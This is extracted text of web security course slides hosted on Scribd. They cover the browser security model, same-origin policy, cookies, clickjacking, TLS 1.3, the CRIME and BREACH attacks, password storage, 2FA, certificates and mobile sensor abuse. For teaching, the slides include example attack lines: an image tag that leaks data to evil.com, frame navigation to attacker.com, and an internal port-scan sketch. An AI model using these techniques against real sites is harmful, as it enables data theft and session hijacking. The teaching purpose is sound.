Scribd
Upload
14 views127 pages

XCS110 All Slides

Uploaded by

Victor Sanchez
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
14 views127 pages

XCS110 All Slides

Uploaded by

Victor Sanchez
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 127

INTRODUCTION

TO WEB SECURITY

John Mitchell
Dan Boneh
MODULE 2
HTTP
Rendering the Content
Isolation
Navigation
Communication
Client State
Click-Jacking
Frame Busting
Introduction
Module 2: Web Background
and the Browser Security Model
Reported Web Vulnerabilities "In the Wild"

Data from aggregator and validator of NVD-reported vulnerabilities


Web vs System vulnerabilities

XSS peak

Decline in % web vulnerabilities since 2009


§ 49% in 2010 -> 37% in 2011.
§ Big decline in SQL Injection vulnerabilities
Web application vulnerabilities
Web Application Vulnerabilities Web Application Vulnerabilities
as a Percentage of All Disclosures in 2010 as a Percentage of All Disclosures in 2011 H1

37%

49% 51%
63%

Web Applications (49%) Others (51%) Web Applications (49%) Others (51%)
Web Security Challenge
Good server
Enter password?
Browser

Network

User

Bad Server
How can honest users safely interact with
well-intentioned sites, while still freely
browsing the web (search, shopping, etc.) ?
Can also operate as
client to other servers
Goals of web security
Safely browse the web
§ Users should be able to visit a variety of web sites, without incurring harm:
› No stolen information (without user’s permission)
› Site A cannot compromise session at Site B
Support secure web applications
§ Applications delivered over the web should have the same security properties we
require for stand-alone applications
And
§ Since many mobile apps are interfaces to web sites,
§ Support security for mobile apps.
Web Threat Models
Web attacker
§ Control attacker.com
§ Can obtain SSL/TLS certificate for attacker.com
§ User visits attacker.com
› Or: runs attacker’s Facebook app
Network attacker
§ Passive: Wireless eavesdropper
§ Active: Evil router, DNS poisoning
Malware attacker
§ Attacker escapes browser isolation mechanisms and run
separately under control of OS
Outline
§ Web security goals and threat models
§ HTTP
§ Rendering: Html, DOM, embedded content, JavaScript
§ Isolation: frames, same-origin policy, HTML5 sandboxing
§ Communication: fragment, post-message, cross-origin request
§ Frame navigation: Same-origin policy, descendant policy
§ Client storage: Cookies, Local storage, Native Client
§ Click-jacking, tap-jacking, frame busting
HTTP
Module 2: Web Background
and the Browser Security Model
Uniform Resource Locator (URL)

Global identifier of network-retrievable content

Example:
http://stanford.edu:81/class?name=cs155#homework

Protocol
Fragment
Hostname
Port Path
Query

Special characters are encoded as hex:


§ %0A = newline
§ %20 or + = space, %2B = + (special exception)
HTTP Request

Method File HTTP version Headers

GET /index.html HTTP/1.1


Accept: image/gif, image/x-bitmap, image/jpeg, */*
Accept-Language: en
Connection: Keep-Alive
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
Host: www.example.com
Referer: http://www.google.com?q=dingbats

Blank line
Data – none for GET

GET : no side effect POST : possible side effect


HTTP Response

HTTP version Status code Reason phrase Headers

HTTP/1.0 200 OK
Date: Sun, 21 Apr 1996 02:20:42 GMT
Server: Microsoft-Internet-Information-Server/5.0
Connection: keep-alive
Content-Type: text/html Data
Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT
Set-Cookie: …
Content-Length: 2543

<HTML> Some data... blah, blah, blah </HTML>

Cookies
Rendering Content
Module 2: Web Background
and the Browser Security Model
Rendering content
Browser execution model
Each browser window or frame
§ Loads content
§ Renders it
› Processes HTML and scripts to display page
› May involve images, subframes, etc.
§ Responds to events
Events can be
§ User actions: OnClick, OnMouseover
§ Rendering: OnLoad, OnBeforeUnload
§ Timing: setTimeout(), clearTimeout()
<head>
<title>Washington Post: Breaking News, World, US, DC News .. Analysis</title>
...
</head>
<body class="eidos homepage sectionfront">
<script type="text/javascript">
if(self!==top&&!(top.window.location.pathname).startsWith('/PortalEdito
r')){top.location=self.location;}
</script>
...
<h2 class="headline"><a href="/world/national-security/nsa-gathered-
thousands-of-americans-e-mails-before-court-struck-down-
program/2013/08/21/146ba4b6-0a90-11e3-b87c-476db8ac34cd_story.html">
Secret court: <br>NSA gathered thousands of domestic e-mails</a>
...
<p class="byline">Ellen Nakashima&#32…</p>
<p class="">
The program unlawfully gathered as many as tens of thousands of e-mails,
according to a 2011 opinion.</p>
...
<div class="hide"><img class=""
src="http://ad.doubleclick.net/ad/N4359.washingtonpost.com/B7241351.19;sz=1x1
;ord=[timestamp]?" width="1" height="1" border="0" style="display: inline-
block; "></div>
...
Share this video:
...
<a class="facebook_static"
onclick="TWP.Module.SocialButtons.staticSocialPopup('http://www.facebook.com/
sharer.php?u=http://www.washingtonpost.com/posttv/video/thefold/tonight-on-
the-fold-august-21-2013/2013/08/21/36ed282c-0a98-11e3-9941-
6711ed662e71_video.html%3Ffb_ref%3Dsm_btn_fb')">
...
Document Object Model (DOM)
Object-oriented interface used to read and write docs
§ web page in HTML is structured data
§ DOM provides representation of this hierarchy

Examples
§ Properties: document.alinkColor, document.URL,
document.forms[ ], document.links[ ], document.anchors[ ]
§ Methods: document.write(document.referrer)

Includes Browser Object Model (BOM)


§ window, document, frames[], history, location, navigator (type
and version of browser)
Changing HTML using Script, DOM
Some possibilities HTML
§ createElement(elementName) <ul id="t1">
<li> Item 1 </li>
§ createTextNode(text) </ul>
§ appendChild(newChild)
§ removeChild(node)

Example: Add a new list item:

var list = document.getElementById('t1')


var newitem = document.createElement('li')
var newtext = document.createTextNode(text)
list.appendChild(newitem)
newitem.appendChild(newtext)
Basic web functionality
HTML Image Tags

<html>

<p> … </p>

<img src=“http://example.com/sunset.gif” height="50" width="100">

</html>

Displays this nice picture è


Security issues?
Security consequences

Image tag security issues


Communicate with other sites
§ <img src=“http://evil.com/pass-local-information.jpg?extra_information”>
Hide resulting image
§ <img src=“ … ” height=“1" width=“1">
Spoof other sites
§ Add logos that fool a user

Important Point: A web page can send information to any site


Basic web functionality
JavaScript onError
Basic function
§ Triggered when error occurs loading a document or an image
Example

<img src="image.gif"
§ Runs onError handler if image does not
onerror="alert('The existcould
image and cannot load
not be loaded.')“
>

http://www.w3schools.com/jsref/jsref_onError.asp
Basic web functionality
JavaScript timing
Sample code
<html><body><img id="test" style="display: none">
<script>
var test = document.getElementById(’test’);
var start = new Date();
test.onerror = function() {
var end = new Date();
alert("Total time: " + (end - start));
}
test.src = "http://www.example.com/page.html";
</script>
</body></html>

§ When response header indicates that page is not an image, the browser
stops and notifies JavaScript via the onerror handler.
Basic web functionality
Port scanning behind firewall
JavaScript can:
§ Request images from internal IP addresses
› Example: <img src=“192.168.0.4:8080”/>
§ Use timeout/onError to determine success/failure
§ Fingerprint webapps using known image names

Server 1) “show me dancing pigs!” scan

Malicious
2) “check this out”
Web page
scan
3) port scan results Browser
scan

Firewall
Remote scripting
Goal
§ Exchange data between a client-side app running in a browser and server-side app, without reloading page
Methods
§ Java Applet/ActiveX control/Flash
› Can make HTTP requests and interact with client-side JavaScript code, but requires LiveConnect (not available on all browsers)
§ XML-RPC
› open, standards-based technology that requires XML-RPC libraries on server and in your client-side code.
§ Simple HTTP via a hidden IFRAME
› IFRAME with a script on your web server (or database of static HTML files) is by far the easiest of the three remote scripting options

Important Point: A web can maintain bi-directional


communication with browser (until user closes/quits)

See: http://developer.apple.com/internet/webcontent/iframe.html
Simple remote scripting example
client.html: RPC by passing arguments to server.html in query string

<script type="text/javascript">
function handleResponse() {
alert('this function is called from server.html') }
</script>
<iframe id="RSIFrame" name="RSIFrame"
style="width:0px; height:0px; border: 0px"
src="blank.html">
</iframe>
<a href="server.html" target="RSIFrame">make RPC call</a>

server.html: another page on same server, could be server.php, etc

<script type="text/javascript">
window.parent.handleResponse()
</script>

RPC can be done silently in JavaScript, passing and receiving arguments


Isolation
Module 2: Web Background
and the Browser Security Model
Frame and iFrame
Window may contain frames from different sources
§ Frame: rigid division as part of frameset
§ iFrame: floating inline frame
iFrame example
<iframe src="hello.html" width=450 height=100>
If you can see this, your browser doesn't understand IFRAME.
</iframe>

Why use frames?


§ Delegate screen area to content from another source
§ Browser provides isolation based on frames
§ Parent may work even if frame is broken
Windows Interact

32
Analogy
Operating system Web browser
Primitives Primitives
§ System calls § Document object model
§ Frames
§ Processes
§ Cookies / localStorage
§ Disk
Principals: “Origins”
Principals: Users § Mandatory access control
§ Discretionary access control
Vulnerabilities
Vulnerabilities § Cross-site scripting
§ Cross-site request forgery
§ Buffer overflow
§ Cache history attacks
§ Root exploit § …
Browser security mechanism

A B A
A

Each frame of a page has an origin


§ Origin = protocol://host:port
Frame can access its own origin
§ Network access, Read/write DOM, Storage (cookies)
Frame cannot access data associated with a different origin
Components of browser security policy
Frame-Frame relationships
§ canScript(A,B)
› Can Frame A execute a script that manipulates arbitrary/nontrivial DOM elements of Frame B?
§ canNavigate(A,B)
› Can Frame A change the origin of content for Frame B?
Frame-principal relationships
§ readCookie(A,S), writeCookie(A,S)
› Can Frame A read/write cookies from site S?
Library import excluded from SOP

<script src=https://seal.verisign.com/getseal?
host_name=a.com></script>

VeriSign

•Script has privileges of imported page, NOT source server.


•Can script other pages in this origin, load more scripts
•Same issues with other forms of importing
Domain Relaxation
www.facebook.com chat.facebook.com

www.facebook.com chat.facebook.com
www.facebook.com

Origin: scheme, host, (port), hasSetDomain


Try document.domain = document.domain
Domain Relaxation
www.facebook.com chat.facebook.com

www.facebook.com
facebook.com
facebook.com
chat.facebook.com
www.facebook.com

Origin: scheme, host, (port), hasSetDomain


Try document.domain = document.domain
HTML5 Frame sandbox
Specify sandbox attribute of iframe
<iframe sandbox src="http://untrusted.site.net/content"></iframe>
Creates restricted frame
§ Plugins are disabled. Any kind of ActiveX, Flash, or Silverlight plugin will not be
executed.
§ Forms are disabled. The hosted content is not allowed to post forms back to any target.
§ Scripts are disabled. JavaScript is disabled and will not execute.
§ Links to other browsing contexts are disabled. An anchor tag targeting different browser
levels will not execute.
§ Unique origin treatment. All content is treated under a unique origin. The content is not
able to traverse the DOM or read cookie information.
Optional attributes relax sandbox
allow-forms
§ Allows embedded page to post back using a form submit within the frame.
allow-scripts
§ Enables JavaScript
allow-same-origin
§ Can access DOM of another frame, subject to same-origin policy
§ Only useful with allow-scripts
§ But be careful: parent frame can manipulate sandbox attributes and remove further
restrictions.
allow-top-navigation
§ Allow content to navigate entire tab/window
allow-popups
§ Allow embedded content to open new popup windows
Navigation
Module 2: Web Background
and the Browser Security Model
Guninski Attack

awglogin

window.open("https://attacker.com/", "awglogin");
What should the policy be?

Sibling
Frame Bust
Child
Descendant

43
Legacy Browser Behavior
Browser Policy
IE 6 (default) Permissive
IE 6 (option) Child
IE7 (no Flash) Descendant
IE7 (with Flash) Permissive
Firefox 2 Window
Safari 3 Permissive
Opera 9 Window
HTML 5 Child
Window Policy Anomaly

top.frames[1].location = "http://www.attacker.com/...";
top.frames[2].location = "http://www.attacker.com/...";
...
Legacy Browser Behavior
Browser Policy
IE 6 (default) Permissive
IE 6 (option) Child
IE7 (no Flash) Descendant
IE7 (with Flash) Permissive
Firefox 2 Window
Safari 3 Permissive
Opera 9 Window
HTML 5 Child
Adoption of Descendent Policy

Browser Policy
IE7 (no Flash) Descendant
IE7 (with Flash) Descendant
Firefox 3 Descendant
Safari 3 Descendant
Opera 9 (many policies)
HTML 5 Descendant
Communication
Module 2: Web Background
and the Browser Security Model
Fragment Identifier Messaging

Send information by navigating a frame


§ http://gadget.com/#hello
Navigating to fragment doesn’t reload frame
§ No network traffic, but frame can read its fragment
Not a secure channel
§ Confidentiality ü
§ Integrity ü
§ Authentication û
window.postMessage
API for inter-frame communication
§ Supported in current browsers

§ A network-like channel between frames

Add a contact

Share contacts
postMessage syntax

frames[0].postMessage("Attack at dawn!",
"http://b.com/");

window.addEventListener("message", function (e) {


if (e.origin == "http://a.com") {
... e.data ... }
}, false);

Attack at dawn!

Facebook
Anecdote
Why include “targetOrigin”?
What goes wrong?

frames[0].postMessage("Attack at dawn!");

Messages sent to frames, not principals


§ When would this happen?

52
Two-way communication
A method call is associated with a response
Can build this on top of postMessage
§ Messenger: Each time you call a method in the iframe, you pass a reply function that is
called with the results of that method call.
jQuery postMessage plugin
Wraps the postMessage API and simplifies its usage.
Works in browsers that do not support postMessage method by using fragment
navigation (hash portion of the url)
Network communication
Site A Site B

Site A context Site B context

Cross-origin network requests


Access-Control-Allow-Origin: <list of domains>
Access-Control-Allow-Origin: *
Client State
Module 2: Web Background
and the Browser Security Model
Cookies
Used to store state on user’s machine
POST …
Browser
Server
HTTP Header:
Set-cookie: NAME=VALUE ;
domain = (who can read) ;
If expires=NULL: expires = (when expires) ;
this session only secure = (only over SSL)

Browser GET …
Cookie: NAME = VALUE
Server

HTTP is stateless protocol; cookies add state


Cookie authentication
Browser Web Server Auth server

POST login.cgi
Username & pwd Validate user

Set-cookie: auth=val auth=val


Store val

GET restricted.html
Cookie: auth=val restricted.html
auth=val Check val

If YES, YES/NO
restricted.html
Cookie Security Policy

Uses:
§ User authentication
§ Personalization
§ User tracking: e.g. Doubleclick (3rd party cookies)

Origin is the tuple <domain, path>


§ Can set cookies valid across a domain suffix
§ Complicated and implementation-specific rules for selecting
cookie values, when many cookies apply
Secure Cookies

GET …
Browser
Server
HTTP Header:
Set-cookie: NAME=VALUE ;
Secure=true

• Provides confidentiality against network attacker


• Browser will only send cookie back over HTTPS

• … but no integrity
• Can rewrite secure cookies over HTTP
Þ network attacker can rewrite secure cookies
Þ can log user into attacker’s account
httpOnly Cookies

GET …
Browser
Server
HTTP Header:
Set-cookie: NAME=VALUE ;
httpOnly

• Cookie sent over HTTP(s), but not accessible to scripts


• cannot be read via document.cookie
• Helps prevent cookie theft via XSS
… but does not stop most other risks of XSS bugs
HTML5 Local Storage
Based on named key/value pairs
§ Store data based on a named key (a string)
§ Retrieve that data with the same key
§ Data can be any type supported by JavaScript
› Including strings, Booleans, integers, floats
› But data is actually stored as a string
Need to use functions like parseInt() or parseFloat() to coerce your retrieved data into the
expected JavaScript datatype
Some browsers also implement Web SQL Database
§ Other forms of local storage would also be useful
Example

Save a sentence in Local Storage :

localStorage.setItem(1,'This is a sample sentence');

Retrieve it:

var data = localStorage.getItem(1);

Local Storage supports length, removeItem() and clear().


Security issues

Storage per origin


§ Origin is: scheme, host, port
Could be accessed by user with local access (varies by browser)
Can be accessed by JavaScript in page
§ no httpOnly so vulnerable to XSS attacks
XSS attacks can read local storage
§ Do not store sensitive information
XSS attacks can write local storage
§ Do not trust data read from local storage
Native Client
Sandboxed native code
Sandbox techniques
Static analysis
§ No loads or stores permitted outside the data sandbox
› Enforced by operating system protection mechanisms
§ No unsafe instructions
› Examples: syscall, int, and lds.
§ Control flow integrity
› All direct, indirect branches target a safe instruction
Dynamic monitoring
§ Native Client runtime mediates system calls
Click-Jacking
Module 2: Web Background
and the Browser Security Model
slide 69

Clickjacking

Attacker overlays multiple transparent or opaque frames to


trick a user into clicking on a button or link on another page

Clicks meant for the visible page are hijacked and routed to
another, invisible page
slide 70

Clickjacking in the Wild


Google search for “clickjacking” returns 342,000 results… this is not a hypothetical
threat!
Summer 2010: Facebook worm superimposes an invisible iframe over the entire page
that links back to the victim's Facebook page
§ If victim is logged in, automatically recommends link to new friends as soon as the
page is clicked on
Many clickjacking attacks against Twitter
§ Users send out tweets against their will
Tap-jacking
Frame Busting
Module 2: Web Background
and the Browser Security Model
Frames

Embed HTML documents in other documents

<iframe name=“myframe”
src=“http://www.google.com/”>
This text is ignored by most
browsers.
</iframe>
Frame Busting

Goal: prevent web page from loading in a frame


§ example: opening login page in a frame will display
correct passmark image

Frame busting:

if (top != self)
top.location.href = location.href
Better Frame Busting

Problem: Javascript OnUnload event

<body onUnload="javascript: cause_an_abort;)">

Try this instead:

if (top != self)
top.location.href = location.href
else { … code of page here …}
• Web security goals and threat models
• HTTP
• Rendering: Html, DOM, embedded content,
JavaScript
• Isolation: frames, same-origin policy, HTML5
sandboxing Summary
• Communication: fragment, post-message, cross-
origin request
• Frame navigation: Same-origin policy, descendant
policy
• Client storage: Cookies, Local storage, Native Client
• Click-jacking, tap-jacking, frame busting
MODULE 3
TLS 1.3
Compression attacks
Password Breaches
Certificates on the Web
Abusing Mobile Sensors
Topics for this section
TLS attacks and defenses:
Compression attacks: CRIME and BREACH, TLS 1.3

Password breaches and 2nd factor authentication

Certificate Authorities: compromises, Lets encrypt, universal TLS

New hardware security support: Intel SGX

Sensor abuse on mobile phones


TLS 1.3
Module 3: Attacks and Defenses
Review: TLS 1.2 from CA
browser server
client-hello
cert
server-hello + server-cert (PK) SK

key exchange (several options)


rand. k
client-key-exchange: E(PK, k)
k
Finished
HTTP data encrypted with KDF(k)

most common: server authentication only


Review: TLS record encryption (original design)
browser server
16KB records

k plaintext HTTP data


k

plaintext integrity tag (MAC)

k encrypt

hdr ciphertext

encryption method is called MAC-then-encrypt : why?


the reason for many attacks on TLS (BEAST, Lucky13, POODLE, … )
TLS 1.3: a new version of TLS (2017)
Record encryption:

• mandatory method: AES128-GCM


fast on x86 (AES-NI) : Intel Skylake, 0.68 cycles/byte

• On weaker processors: CHACHA20_POLY1305


fast in software

Both methods provide authenticated encryption


TLS 1.3: a new version of TLS (2017)
Session setup:
• Forward secrecy required (non-forward secure method is deprecated)

• Zero round-trip setup option:


client can send encrypted data on first flow (after client-hello)

• Server certificate is encrypted (previously, sent in the clear)


stronger privacy when server has multiple certificates

• Initiate TLS session from a pre-shared secret, if one exists


more general than session-resume in TLS 1.2
Compression
Attacks
Module 3: Attacks and Defenses
Compression and Encryption
Strong desire to combine compression and encryption

How?

Option 1: first encrypt and then compress

Does not work … ciphertext looks like a random string


Compression and Encryption
Option 2: first compress and then encrypt
Used in many Internet protocols (TLS, HTTPS, QUIC, …)

POST /bank.com/buy?id=aapl
Cookie: uid=JhPL8g69684rksfsdg

Recall in TLS: 16KB records


Support for compression before encryption
Trouble … [Kelsey’02]

Compress-then-encrypt reveals information:

POST /bank.com/buy?id=aapl
Cookie: uid=JhPL8g69684rksfsdg

POST /bank.com/buy?id=goog
Cookie: uid=JhPL8g69684rksfsdg

Second message compresses better than first:


network observer can distinguish the two messages!
Even worse: the CRIME attack [RD’2012]
(simplified)

POST /bank.com/buy?id=aapl
Cookie: uid=JhPL8g69684rksfsdg
Host: bank.com

Javascript
Goal: steal user’s bank cookie
Javascript can issue requests to Bank,
but cannot read Cookie value
Even worse: the CRIME attack [RD’2012]
(simplified)

POST /bank.com/buy?uid=A11111…
16KB Cookie: uid=J hPL8g69684rksfsdg
Host: bank.com

Observe ciphertext size


Even worse: the CRIME attack [RD’2012]
(simplified)

POST /bank.com/buy?uid=B11111…
16KB Cookie: uid=J hPL8g69684rksfsdg
Host: bank.com

Observe ciphertext size


Even worse: the CRIME attack [RD’2012]
(simplified)

POST /bank.com/buy?uid=J11111…
16KB Cookie: uid=J hPL8g69684rksfsdg
Host: bank.com

Ciphertext size is slightly shorter


⇒ first character of Cookie is “J”
Even worse: the CRIME attack [RD’2012]
(simplified)

POST /bank.com/buy?uid=Ja1111…
16KB Cookie: uid=Jh PL8g69684rksfsdg
Host: bank.com

Observe ciphertext size


Even worse: the CRIME attack [RD’2012]
(simplified)

POST /bank.com/buy?uid=Jh1111…
16KB Cookie: uid=Jh PL8g69684rksfsdg
Host: bank.com

Ciphertext size is slightly shorter


⇒ 2nd character of Cookie is “h”
Even worse: the CRIME attack [RD’2012]
(simplified)

POST /bank.com/buy?uid=Jh1111…
16KB Cookie: uid=Jh PL8g69684rksfsdg
Host: bank.com

Recover entire cookie after


256 × (len of Cookie) attempts
Takes several seconds (simplified)
What to do?
The problem:
Observed ciphertext length reveals compression amount ⇒
reveals plaintext info … no good solution

Non-defense: add a random length pad to ciphertext

First defense: compression disabled in TLS (and others, e.g., SPDY)

Problem: compression also done in HTTP layer


⇒ BREACH attack [PHG’13]
… much harder to disable HTTP compression in practice
What to do? [PHG’13]

Many web sites are impacted …

A proposed defense:

› Application layer “tags” sensitive data fields in


HTTP requests and responses (cookies, PII, etc.)
› HTTP-level compression only applied to non-sensitive fields

… but not easy to implement


Password
Breaches
Module 3: Attacks and Defenses
A (small) sample of password breaches
(server-side compromise)
2012: Linked-in: 6 million passwords (hashed, unsalted)
2013:
Twitter: 250,000 passwords (hashed, salted)
Evernote: 50 million records: usernames, emails, hashed passwords
Adobe: 38 million records
email addrs., password hints, and encrypted passwords
2015:
LastPass: stolen email addr., hashed master passwords (and salts)
Weak password choice
Users frequently choose weak passwords: (adobe list, 2013)

Password: 123456 123456789 password adobe123 12345678 qwerty 1234567

A common occurrence
Fraction 2009 (6 most
Example: the5%
Rockyou password
1.1% list,0.9% 0.5% common pwds) 0.5%
0.5% 0.3%
of users:
123456, 12345, Password, iloveyou, princess, abc123

List of 360,000,000 words covers about 25% of user passwords Total: 8.8%
How to store passwords
First rule of password storage: never store passwords in the clear !

password database
Alice
Alice SA H(pwA , SA)
pwA
Bob SB H(pwB , SB)
… … …
id salt hash
To validate a given password server checks:
H(pwA , SA) ≟ StoredHash(Alice)
How to hash?
Linked-in: SHA-1 hashed (unsalted) passwords
⇒ 6 days, 90% of pwds. recovered by exhaustive search
The problem: SHA-1 is too fast …
attacker can try all words in dictionary

To hash passwords:

• Use a keyed hash function (e.g., HMAC) where key stored in HSM

• In addition: use a slow, space-hard function


How to hash?
PBKDF2, bcrypt: slow hash functions
• Slowness by “iterating” a crypto hash function like SHA256
• Parameterized number of iterations (e.g., set for 1000 evals/sec)

Problem: custom hardware (e.g., GPU) can evaluate


hash function much faster than a commodity CPU

⇒ attacker can do dictionary attack much faster


than 1000 evals/sec.
Why is custom hardware faster?
only small part of CPU custom hardware
used to hash for Bitcoin mining ($1,695)
6000
6 mill
5000
5060
5 mill
4 mill
4000

3 mill
50x
3000

2 mill
2000

1 mill
1000
93
0
0
Intel x86 Antminer

Intel Skylake Antminer S7 5.06TH/s


How to hash?
Scrypt: a slow hash function AND need lots of memory to evaluate
⇒ custom hardware not much faster than commodity CPU

Problem: memory access pattern depends on input password


⇒ local attacker can learn memory access pattern for user’s pwd
⇒ eliminates need for memory in an offline dictionary attack

Is there a space-hard function where time is independent of pwd?


• Pwd hashing competition (2015): Argon2i (also see Balloon hashing)
Strengthening User Authentication
One option: biometrics:
Fingerprints, retina, facial recognition, …
Benefit: hard to forget

Problems:
Biometrics are not generally secret
Cannot be changed, unlike passwords

Þ Should primarily be used as a second factor authentication note: CCC’13


2nd factor OTP authentication
Setup:
Choose random key k
On device and server: sk = (k,0)

Identification:

user r0 ¬ HMAC(k,0) server


(k,0) yes iff
(k,0)
r1 ¬ HMAC(k,1) r = HMAC(k,0)
(k,1) (k,1)

often, time-based updates


Google authenticator
6-digit timed one-time passwords (TOTP) [RFC 6238]

Gmail, Dropbox, WordPress, …


Wide web-site adoption:
› Open study: 6.4% Gmail user adoption [EuroSec 2015]

To enable TOTP for a user: web site presents QR code with


embedded data: otpauth://totp/Example:[email protected]?
secret=JBSWY3DPEHPK3PXP & issuer=Example

(Subsequent user logins require user to present TOTP)

Danger: password reset upon user lockout


Server compromise exposes secrets
March 2011:
RSA announced servers attacked, secret keys stolen
⇒ enabled SecurID user impersonation

Can we do better? Answer: Yes!


Duo (also FIDO U2F ) verify

Signature-based challenge response:

login page
pwd
data
user database
g e : m
confirm h a lle n Alice pkA
2FA c
k , m)
si g n ( s Bob pkB
o ns e :
Resp … …
sk
id pub-key
No secrets on server, simple user experience
Certificates
on the Web
Module 3: Attacks and Defenses
Certificate Issuance Woes
Wrong issuance:
2011: Comodo and DigiNotar RAs hacked, issue certs for Gmail, Yahoo! Mail
2013: TurkTrust issued cert. for gmail.com (discovered by pinning)
2014: Indian NIC (intermediate CA trusted by the root CA IndiaCCA) issue certs
for Google and Yahoo! domains
Result: (1) India CCA revoked NIC’s intermediate certificate
(2) Chrome restricts India CCA root to only seven Indian domains
2015: MCS (intermediate CA cert issued by CNNIC) issues certs for Google
domains
Result: current CNNIC root no longer recognized by Chrome
⇒ enables eavesdropping w/o a warning on user’s session
Man in the middle attack using rogue cert
GET https://bank.com BadguyCert BankCert
ClientHello attacker ClientHello bank

ServerCert (rogue) ServerCert (Bank)


(cert for Bank by a valid CA)
SSL key exchange SSL key exchange
k1 k1 k2 k2
HTTP data enc with k1 HTTP data enc with k2

Attacker proxies data between user and bank.


Sees all traffic and can modify data at will.
What to do? (many good ideas)
HPKP: HTTP public-key pinning
§ HTTP header that lets a site declare CAs that can sign its cert
Public-Key-Pins: pin-
sha256="cUPcTAZWKaASuYWhhneDttWpY3oBAkE3h2+soZS7sWs=";
§ on subsequent HTTPS, browser rejects certs issued by other CAs
§ TOFU: Trust on First Use

Certificate Transparency (CT): [LL’12]


§ idea: CA’s must advertise a log of all certs. they issued
§ Browser will only use a cert if it is on the CT log
• Efficient implementation using Merkle hash trees
• Companies can scan logs to look for invalid issuance
A new CA: Let’s encrypt (letsencrypt.org)
A new open Certificate Authority: free certs
• Provisioning via an automated agent running on web server

Step 1: install agent on web server 2016: 800K certs issued


Step 2: agent proves domain ownership (e.g. bank.com) by
DNS record under bank.com or page at fixed URI at bank.com
and send Certificate Signing Request (CSR) to CA
Step 3: Let’s encrypt CA checks domain ownership
if valid, issue cert and sends cert to agent
Step 4: agent installs cert on Web server … done
Abusing
Mobile Sensors
Module 3: Attacks and Defenses
Sensors on smart phones
Microphone
Camera All have a specific function
GPS
Light sensor Can they be abused ??
Compass
MEMS Gyroscope / accelerometer
Power meter no user
Barometer
permission
Heart rate / oximeter (on smart watches)
required
Example 1: fingerprinting
Imperfections in camera sensor can be used to link pictures taken by same phone
[LG’06]

Accelerometer gives a stable device fingerprint [BBMN’14, DRXCN’14]


§ App. can tell if it has been previously installed on device

device-id
app
Example 2: Gyrophone [MBN’14]

Phone gyroscope: measures vibrations (used for games)

Trouble:
› Gyroscope picks up air vibrations (a.k.a speech)
› Sample rate (apps.): 200Hz
› Machine learning ⇒ can recognize some speech
Example 3: Power usage sensor
Modern phones measure power drained from battery
Enables apps to optimize power use

Repeatedly read:
/sys/class/power_supply/battery/voltage_now
/sys/class/power_supply/battery/current_now

Unrestricted access.
Can this be abused?
Example 3: Power usage sensor

Can this be abused? [MBSN’15]


Observation: power used by radio depends on
distance and obstacles to cell tower
So what?
Our work: [MBSN’15]
power readings + machine learning ⇒ GPS

Why? Routes in a city have unique power fingerprints


Three goals:
✓ 1. identify route car is taking among a known set of routes
✓ 2. identify car’s location along a known route
✓ 3. identify car’s route based on a database of
pre-measured short segments
Identify location along known route
Main tool: dynamic time warping (DTW)
⇒ Aligns pre-recorded data with current samples
Identify location along known route
Main tool: dynamic time warping (DTW)
⇒ Aligns pre-recorded data with current samples
Lessons
Sensors can have unintended consequences
There is risk in giving apps direct access to sensors

Prevention:

• Always require permissions to access sensors

• Reduce data from sensors to min needed for utility


or only provide abstract view of sensor data
Final note: limitations of air gaps
A machine holds sensitive date and is isolated from network
• If it gets infected, can the malware exfiltrate data?

Answer: yes! [Usenix Sec 2015]


• Mimic GSM signals using data bus
• Use x86 instruction: MOVNTDQ m128, xmm

• Effective for 60 feet

You might also like